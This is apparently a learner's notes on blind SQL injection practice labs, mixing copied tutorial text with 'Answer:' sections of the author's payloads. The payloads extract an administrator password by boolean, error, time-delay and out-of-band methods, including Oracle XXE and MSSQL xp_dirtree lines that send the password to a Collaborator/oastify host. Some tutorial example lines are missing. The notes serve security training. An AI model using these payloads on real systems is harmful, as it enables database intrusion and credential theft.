vulnerable
top10owasp
exploits
tutorials
Blind SQL injection arises when an application is vulnerable to SQL injection, but its HTTP responses do not contain the results of the relevant SQL query or the details of any database errors.
With blind SQL injection vulnerabilities, many techniques such as UNION attacks, are not effective because they rely on being able to see the results of the injected query within the application's responses. It is still possible to exploit blind SQL injection to access unauthorized data, but different techniques must be used.
Consider an application that uses tracking cookies to gather analytics about usage. Requests to the application include a cookie header like this:
Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4
When a request containing a TrackingId cookie is processed, the application determines whether this is a known user using an SQL query like this:
SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'
This query is vulnerable to SQL injection, but the results from the query are not returned to the user. However, the application does behave differently depending on whether the query returns any data. If it returns data (because a recognized TrackingId was submitted), then a "Welcome back" message is displayed within the page.
This behavior is enough to be able to exploit the blind SQL injection vulnerability and retrieve information by triggering different responses conditionally, depending on an injected condition. To see how this works, suppose that two requests are sent containing the following TrackingId cookie values in turn:
The first of these values will cause the query to return results, because the injected AND '1'='1 condition is true, and so the "Welcome back" message will be displayed. Whereas the second value will cause the query to not return any results, because the injected condition is false, and so the "Welcome back" message will not be displayed. This allows us to determine the answer to any single injected condition, and so extract data one bit at a time.
For example, suppose there is a table called Users
with the columns Username and Password, and a user called Administrator
. We can systematically determine the password for this user by sending a series of inputs to test the password one character at a time.
To do this, we start with the following input:
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm
This returns the "Welcome back" message, indicating that the injected condition is true, and so the first character of the password is greater than m
.
Next, we send the following input:
This does not return the "Welcome back" message, indicating that the injected condition is false, and so the first character of the password is not greater than t.
Eventually, we send the following input, which returns the "Welcome back" message, thereby confirming that the first character of the password is s:
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 's
We can continue this process to systematically determine the full password for the Administrator
user.
Note
The SUBSTRING function is called SUBSTR on some types of database.
Answer:
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a
==> Welcomeback is return and we know adminstrator really exist on users table and password can start with a
like kind of this.TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>2)='a
TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>3)='a
TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a
TrackingId=xyz' AND (SELECT SUBSTRING(password,§1§,1) FROM users WHERE username='administrator')='§a§
In the preceding example, suppose instead that the application carries out the same SQL query, but does not behave any differently depending on whether the query returns any data. The preceding technique will not work, because injecting different Boolean conditions makes no difference to the application's responses.
In this situation, it is often possible to induce the application to return conditional responses by triggering SQL errors conditionally, depending on an injected condition. This involves modifying the query so that it will cause a database error if the condition is true, but not if the condition is false. Very often, an unhandled error thrown by the database will cause some difference in the application's response (such as an error message), allowing us to infer the truth of the injected condition.
To see how this works, suppose that two requests are sent containing the following TrackingId cookie values in turn:
These inputs use the CASE keyword to test a condition and return a different expression depending on whether the expression is true. With the first input, the CASE expression evaluates to 'a', which does not cause any error. With the second input, it evaluates to 1/0, which causes a divide-by-zero error. Assuming the error causes some difference in the application's HTTP response, we can use this difference to infer whether the injected condition is true.
Using this technique, we can retrieve data in the way already described, by systematically testing one character at a time:
xyz' AND (SELECT CASE WHEN (Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') THEN 1/0 ELSE 'a' END FROM Users)='a
Answer:
'
to see what return and it return Internal Server ErrorTrackingId=xyz'||(SELECT '')||'
it will valid for database except Oracle so we need use dual tableTrackingId=xyz'||(SELECT '' FROM dual)||'
and with this it take affect and yeah it right oracle' (SELECT '' FROM dual)--
it take not affect and cause ERR' UNION SELECT 'a','a' FROM dual--
and it also cause ERR and so need to accept above for good payload to test because after reading the Oracle it will accept ||
is available for payload. Okay i need read above some kind like to upgrade my acknowledge so continue TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
Case
to test with DBTrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
and it cause ERR take a look with next payloadTrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
and it not cause ERR we will know it okay with that so change users table and take a look with FROM users
TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||
and it cause err so we already know administrator is really exist on database.TrackID=xyz'||(SELECT CASE WHEN LENGTH(password) > 20 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
do it manual or with burpsuite is your decide i will check the length 1-20 and if password greater than 20 it will not return error so we know password is exactly contain 20 character.TrackID=xyz'||(SELECT CASE WHEN SUBSTRING(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
and will need send it to instruder and take a change on the twice place like this '||(SELECT CASE WHEN SUBSTRING(password,§1§,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
and select CLUSTER BOOB method to with multiple list payload and
'||(SELECT CASE WHEN SUBSTR(password,§1§,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
In the preceding example, suppose that the application now catches database errors and handles them gracefully. Triggering a database error when the injected SQL query is executed no longer causes any difference in the application's response, so the preceding technique of inducing conditional errors will not work.
In this situation, it is often possible to exploit the blind SQL injection vulnerability by triggering time delays conditionally, depending on an injected condition. Because SQL queries are generally processed synchronously by the application, delaying the execution of an SQL query will also delay the HTTP response. This allows us to infer the truth of the injected condition based on the time taken before the HTTP response is received.
The techniques for triggering a time delay are highly specific to the type of database being used. On Microsoft SQL Server, input like the following can be used to test a condition and trigger a delay depending on whether the expression is true:
The first of these inputs will not trigger a delay, because the condition 1=2 is false. The second input will trigger a delay of 10 seconds, because the condition 1=1 is true.
Using this technique, we can retrieve data in the way already described, by systematically testing one character at a time:
'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--
Answer
Lab: Blind SQL injection with time delays we need cause SQLi to delay 10 second for web application
And we test some kind of payload and know it postSQL through delay time and we can cause this
TrackingId=x'||SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
and i think it not work this LAB so do it with basicly TrackingId=x'|| pg_sleep(10)--
The work on do in this LAB is wait to receive respone from server
Lab: Lab: Blind SQL injection with time delays and information retrieval, with this lab we need to exploit the username and password and take this to login administrator
So first we need to pay attention to find what payload available for this database Oracle or PorgeSQL IDK so take a payload and wait if it respone after second with right condition it will be that database so take a test
So with first Oracle payload it not respone after 10 second so it not like this database, So with second we will test it with MicrosoftSQL Server not yet, and yeal we find it the database it use is PostgreSQL and yet but you need payattention on some situation we need to url encode the payload for cookie submit IDK why we need on this lab because some other labs it will not need that
';SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
==> '%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
Next we confirm that so we will check users table really existed on this database and check that adminstrator is really existed on users table like this
the payload cause this is '%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
it means we select on case username='administrator' exist if it existed it cause sleep 10 second to respone and if not do not thing and response
Now we continue to check the length of password by the condition like this
'%3BSELECT+CASE+WHEN+(LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users WHERE username='administrator'--
so like this above we need to check length from 1 to 20 and if the length greater than 20 it will directly response and not wait so we can know exactly 20 character is password length
So we will use SUBSTRING Function on database to get the variables of that to guessing what position of character like this '%3BSELECT+CASE+WHEN+(SUBSTRING(password,§1§,1)='§a§')+THEN+pg_sleep(5)+ELSE+pg_sleep(0)+END+FROM+users WHERE username='administrator'--
and choose cluster boom with first position is numberic from 1-20 and seconds position is bruteforces list alphabet and numberic from 0-9
And we test this situation by using resource pool tab on instruder because we need to check only one so we need choose custom reousrce pool 1 for 1 times request and START ATTACK and on result tab we can choose column to see the response receive (time to response) and yeah we take it after 5 6 minute for 720 request
And greate we had all of response and password is > 5000 because we choose time to response 4-5s
Now, suppose that the application carries out the same SQL query, but does it asynchronously. The application continues processing the user's request in the original thread, and uses another thread to execute an SQL query using the tracking cookie. The query is still vulnerable to SQL injection, however none of the techniques described so far will work: the application's response doesn't depend on whether the query returns any data, or on whether a database error occurs, or on the time taken to execute the query.
In this situation, it is often possible to exploit the blind SQL injection vulnerability by triggering out-of-band network interactions to a system that you control. As previously, these can be triggered conditionally, depending on an injected condition, to infer information one bit at a time. But more powerfully, data can be exfiltrated directly within the network interaction itself.
A variety of network protocols can be used for this purpose, but typically the most effective is DNS (domain name service). This is because very many production networks allow free egress of DNS queries, because they are essential for the normal operation of production systems.
The easiest and most reliable way to use out-of-band techniques is using Burp Collaborator. This is a server that provides custom implementations of various network services (including DNS), and allows you to detect when network interactions occur as a result of sending individual payloads to a vulnerable application. Support for Burp Collaborator is built in to Burp Suite Professional with no configuration required.
The techniques for triggering a DNS query are highly specific to the type of database being used. On Microsoft SQL Server, input like the following can be used to cause a DNS lookup on a specified domain:
'; exec master..xp_dirtree '//0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net/a'--
Answer:
'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
Through of this we can know Ip address of website it like webhook cause SQLi and yeah quite fun so let take a look on the big problem to take adminisrtator password with this method
Having confirmed a way to trigger out-of-band interactions, you can then use the out-of-band channel to exfiltrate data from the vulnerable application. For example:
'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='Administrator');exec('master..xp_dirtree "//'+@p+'.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net/a"')--
This input reads the password for the Administrator user, appends a unique Collaborator subdomain, and triggers a DNS lookup. This will result in a DNS lookup like the following, allowing you to view the captured password:
S3cure.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net
Out-of-band (OAST) techniques are an extremely powerful way to detect and exploit blind SQL injection, due to the highly likelihood of success and the ability to directly exfiltrate data within the out-of-band channel. For this reason, OAST techniques are often preferable even in situations where other techniques for blind exploitation do work.
Answer:
'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.npg1hiusnnzi4earvlf5f6gnwe25qu.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--
'+||+SELECT%2bEXTRACTVALUE(xmltype('<%253fxml%2bversion%253d"1.0"%2bencoding%253d"UTF-8"%253f><!DOCTYPE%2broot%2b[%2b<!ENTITY%2b%2525%2bremote%2bSYSTEM%2b"http%253a//'||(SELECT%2bpassword%2bFROM%2busers%2bWHERE%2busername%253d'administrator')||'.npg1hiusnnzi4earvlf5f6gnwe25qu.oastify.com/">%2b%2525remote%253b]>'),'/l')%2bFROM%2bdual--
In all of the labs so far, you've used the query string to inject your malicious SQL payload. However, it's important to note that you can perform SQL injection attacks using any controllable input that is processed as a SQL query by the application. For example, some websites take input in JSON or XML format and use this to query the database.
These different formats may even provide alternative ways for you to obfuscate attacks that are otherwise blocked due to WAFs and other defense mechanisms. Weak implementations often just look for common SQL injection keywords within the request, so you may be able to bypass these filters by simply encoding or escaping characters in the prohibited keywords. For example, the following XML-based SQL injection uses an XML escape sequence to encode the S character in SELECT:
This will be decoded server-side before being passed to the SQL interpreter.
Answer: